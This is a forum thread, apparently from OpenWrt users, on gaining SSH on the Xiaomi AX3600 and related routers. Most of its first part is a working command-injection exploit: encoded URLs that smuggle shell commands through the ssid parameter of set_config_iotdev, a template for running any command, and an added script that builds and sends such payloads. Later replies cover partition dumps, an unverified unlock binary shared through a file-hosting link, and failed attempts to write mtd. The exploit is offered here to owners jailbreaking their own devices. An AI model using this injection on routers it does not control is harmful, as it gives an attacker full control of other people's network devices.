Xiaomi AX3600 SSH guide

Half a year has passed since the release of the Xiaomi WiFi 6 router AX3600, and finally we can get SSH access on it.
The original exploit was found by LonGDikE from the Chinese Enshan forum.
Here are the steps:

  1. Downgrade your router to version 1.0.17: http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r3600/miwifi_r3600_firmware_5da25_1.0.17.bin
  2. Log in to your router and get the STOK from the URL, which looks like the following:
    http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router
  3. Access these URLs in your browser:

(nvram set ssh_en=1;nvram commit)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

(sed -i 's/channel=.*/channel="debug"/g' /etc/init.d/dropbear)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bsed%20-i%20's/channel=.*/channel=%5C%22debug%5C%22/g'%20/etc/init.d/dropbear%3B

(/etc/init.d/dropbear start)
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B/etc/init.d/dropbear%20start%3B

  4. If everything is OK, SSH is enabled now.

PS: You can execute any shell command like this:
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B<your encoded shell code>%3B

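The post's three URLs are one pattern: a command, percent-encoded, wrapped in `-h%3B` ... `%3B` and placed in the `ssid` parameter of `set_config_iotdev`. The script below is an added example, not code from the original post or from Xiaomi, that builds such URLs for any command so they can be reviewed before being sent. The host, STOK and command are inputs; `bssid=Xiaomi`, `user_id=longdike` and the leading `-h;` / trailing `;` are copied verbatim from the post's payloads. The script name `ax3600_inject.sh` and the use of `curl` for sending are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original post): build set_config_iotdev URLs
# that carry a shell command in the `ssid` parameter, in the shape the post
# uses. bssid=Xiaomi, user_id=longdike, the leading "-h;" and the trailing
# ";" are copied from the post's payloads; host, STOK and command are inputs.
export LC_ALL=C   # handle the command byte by byte so every byte gets encoded

# Percent-encode a string, leaving RFC 3986 unreserved characters and "/"
# untouched (the post leaves "/" raw in the paths it injects).
urlencode() {
  _s=$1
  _out=
  while [ -n "$_s" ]; do
    _c=${_s%"${_s#?}"}          # first byte of the remaining input
    _s=${_s#?}                  # drop it
    case $_c in
      [a-zA-Z0-9.~_/-]) _out="$_out$_c" ;;
      *) _out="$_out$(printf '%%%02X' "'$_c")" ;;
    esac
  done
  printf '%s' "$_out"
}

# URL for one injected command: iotdev_cmd_url <host> <STOK> <command>
iotdev_cmd_url() {
  printf 'http://%s/cgi-bin/luci/;stok=%s/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%%3B%s%%3B' \
    "$1" "$2" "$(urlencode "$3")"
}

# The post's three steps, one URL per line, for review before anything is sent.
enable_ssh_urls() {
  iotdev_cmd_url "$1" "$2" 'nvram set ssh_en=1; nvram commit'; echo
  iotdev_cmd_url "$1" "$2" 'sed -i '"'"'s/channel=.*/channel="debug"/g'"'"' /etc/init.d/dropbear'; echo
  iotdev_cmd_url "$1" "$2" '/etc/init.d/dropbear start'; echo
}

# Send one command and print only the HTTP status code.
# Assumption of this example: curl is available on the machine that holds
# the logged-in browser session (the STOK belongs to that session).
send_cmd() {
  curl -s -o /dev/null -w '%{http_code}\n' "$(iotdev_cmd_url "$1" "$2" "$3")"
}

# Usage (script name is hypothetical):
#   ./ax3600_inject.sh <host> <STOK>              # print the three enable-SSH URLs
#   ./ax3600_inject.sh <host> <STOK> '<command>'  # send one arbitrary command
if [ "$#" -ge 2 ]; then
  if [ "$#" -eq 2 ]; then enable_ssh_urls "$1" "$2"; else send_cmd "$1" "$2" "$3"; fi
fi
```

The encoder percent-encodes `_` as well as the rest, whereas the post spells it `%5F` for `ssh_en` and leaves it raw elsewhere; both decode to the same command on the router, so either form works. Quotes inside the command (as in the `sed` step) come out as `%27` and `%22`, which avoids the browser re-encoding them differently.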

Did your Redmi AX5 have version 1.0.16 installed when you received it or did you downgrade?

I'm wondering how to find the download links for previous versions for the Mi AX1800.

Yes, received with 1.0.16 on the AX5.

If I find something for the AX1800 I'll let you know.


I think I need to downgrade to 1.0.34, the link is available on right.com.cn forum but I'm not a member, maybe someone with access could post it here.

Edit: No need to downgrade, gained SSH access to the Mi AX1800 running the latest 1.0.336 firmware after a reset and setup in router mode; in AP mode it didn't work.

I also have the AX5 and would love to load OpenWrt on it. Is there anything I can do to assist?

Looks like SSH can be permanent, but I'm having trouble with the Chinese forum... if someone could translate all the steps here, please...

"AX3600 permanently open telnet-ssh, you can upgrade and restore at will"
https://www.right.com.cn/forum/thread-4045295-1-1.html

Edit: I managed to translate the post, but I can't get the attachment :(

Step 1: Back up Xiaomi's bdata partition, which contains the router's SN code, SSH and other information. Before doing anything, confirm the router's partition details:

root@XiaoQiang:~# cat /proc/mtd | grep bdata

mtd9: 00080000 00020000 "bdata"

You can see that my bdata partition is mtd9. Then enter the following command:

nanddump -f /tmp/bdata_mtd9.img /dev/mtd9

After the backup is complete, copy the bdata_mtd9.img file from the /tmp directory to your computer. You can use the WinSCP software to copy it directly, or use the scp command.
After the copy is completed, for safety reasons, I suggest making another copy and saving it, just in case.
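The backup step above reads the partition index by eye from `/proc/mtd` and trusts that `nanddump` produced a complete image. The helpers below are an added example, not part of the translated post or of the Xiaomi firmware: they pick the `mtdN` device for a partition name out of `/proc/mtd` text and check that the dumped file is exactly as large as the size the kernel reports for that partition, which is the check worth doing before the crash/bdata write-back steps are attempted. The `/proc/mtd` excerpt is constructed for the example (the `bdata` line matches the post; the other lines are made up), and the size check assumes `nanddump` wrote only the data area, i.e. no OOB bytes, which is its behaviour without `-o` on current mtd-utils.

```shell
#!/bin/sh
# Added example (not from the forum post): find an mtd partition by name in
# /proc/mtd output and verify a nanddump image against the reported size.

# Constructed sample in /proc/mtd format (dev size erasesize name). Only the
# "bdata" line is taken from the post; the rest is invented for the example.
SAMPLE_PROC_MTD='dev:    size   erasesize  name
mtd0: 00100000 00020000 "0:SBL1"
mtd8: 00080000 00020000 "crash"
mtd9: 00080000 00020000 "bdata"
mtd10: 00100000 00020000 "0:ART"'

# mtd_dev_by_name <name> <proc_mtd_text>: print e.g. mtd9 for bdata, nothing
# if the partition does not exist. Names containing spaces are not handled.
mtd_dev_by_name() {
  printf '%s\n' "$2" | awk -v want="\"$1\"" '$4 == want { sub(":", "", $1); print $1; exit }'
}

# mtd_size_bytes <name> <proc_mtd_text>: partition size in bytes (the size
# column is hexadecimal). Returns 1 if the partition is not listed.
mtd_size_bytes() {
  _hex=$(printf '%s\n' "$2" | awk -v want="\"$1\"" '$4 == want { print $2; exit }')
  [ -n "$_hex" ] || return 1
  echo $((0x$_hex))
}

# check_backup <name> <proc_mtd_text> <image_file>: succeed only if the image
# is exactly as large as the partition. Assumes the dump holds the data area
# only (nanddump without -o), so an OOB-inclusive dump will be reported as a
# mismatch rather than silently accepted.
check_backup() {
  _size=$(mtd_size_bytes "$1" "$2") || return 1
  _have=$(wc -c < "$3" | tr -d ' ')
  [ "$_have" -eq "$_size" ]
}

# On the router itself this is the full backup step:
#   name=bdata
#   dev=$(mtd_dev_by_name "$name" "$(cat /proc/mtd)")
#   nanddump -f /tmp/${name}_${dev}.img /dev/$dev
#   check_backup "$name" "$(cat /proc/mtd)" /tmp/${name}_${dev}.img && echo "backup ok"
```

With the sample text, `mtd_dev_by_name bdata` yields `mtd9` and `mtd_size_bytes bdata` yields 524288 (0x80000), so a correct `bdata_mtd9.img` must be exactly 524288 bytes; copy it off the router and compare the size again after the transfer.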

I don't understand how just backing up the partition can make ssh permanent. How to restore the partition (and enable ssh) if you no longer have access to ssh?


You actually need a file, which will hack and unlock mtd to gain permanent telnet access, and then start the ssh service via command afterwards. I got the file, but I don't know how to upload it here.

You can upload it anywhere (like gofile) and send the link here
https://gofile.io/welcome

https://gofile.io/d/Lb8nKH

Can you tell from where you got the binary file and if there is any version for the Redmi AX5 and Xiaomi AX1800?

What am I supposed to do with that file after performing mtd9 backup?

Hi,

Worked on Redmi AX5 with 1.0.26 firmware.

Thanks


Did anybody come across the following problem?

root@ax3600:~# mtd write /tmp/bdata_mtd9.img bdata
Could not open mtd device: bdata
Can't open device for writing!

I follow the procedure description, but I keep getting the above.

mtd partitions are usually read only.

That I understand, however the hack from this forum: https://www.right.com.cn/forum/thread-4045295-1-1.html involves flashing the crash partition with a file that is supposed to allow writing to mtd9 after a reboot. Unfortunately that does not seem to work for me, and I am wondering what the reason might be.

There is a good description here of how to get permanent ssh that survives a firmware upgrade:
https://www.5v13.com/mesh/26276.html#

However, I am also stuck at the write-back step.

root@XiaoQiang:~# mtd write /tmp/bdata_mtd9.img bdata
Could not open mtd device: bdata
Can't open device for writing!

Has anyone figured out how to solve it?

The crash_unlock.img is written successfully, or at least it seems so.

root@XiaoQiang:~# mtd write /tmp/crash_unlock.img crash
Unlocking crash ...

Writing from /tmp/crash_unlock.img to crash ...
root@XiaoQiang:~#

You normally need to install the kmod-mtd-rw package to be able to write mtd partitions.


Yeah, actually the crash_unlock.img file is supposed to make the mtd partitions writeable.
I also tried that way, but the kmod-mtd-rw package was not available at all at https://downloads.openwrt.org/snapshots/packages/aarch64_cortex-a53/packages/
I got this
https://mgmt.saar.freifunk.net/openwrt/releases/18.06.8/targets/mvebu/cortexa53/kmods/4.14.171-1-e2d32c880dc65b62ec0410e12611f89c/kmod-mtd-rw_4.14.171+git-20160214-1_aarch64_cortex-a53.ipk
then copied it to the router's /tmp folder, then installed it into memory:

root@XiaoQiang:~# opkg install --nodeps --dest ram /tmp/kmod-mtd-rw_4.14.171+git-20160214-1_aarch64_cortex-a53.ipk
Installing kmod-mtd-rw (4.14.171+git-20160214-1) to ram...
Configuring kmod-mtd-rw.
root@XiaoQiang:~# insmod mtd-rw i_want_a_brick=1
Failed to find mtd-rw. Maybe it is a built in module ?

But still no luck! :(


Kernel modules must match the running kernel exactly (not just the same upstream version, but also the same patches and configuration); there is only very little leeway. Non-matching kernel versions usually just result in the module not being considered; the same version with non-matching patches/config likely causes crashes.

In order to match, you'd need the 4.4.60 based OEM kernel, but you don't have its source.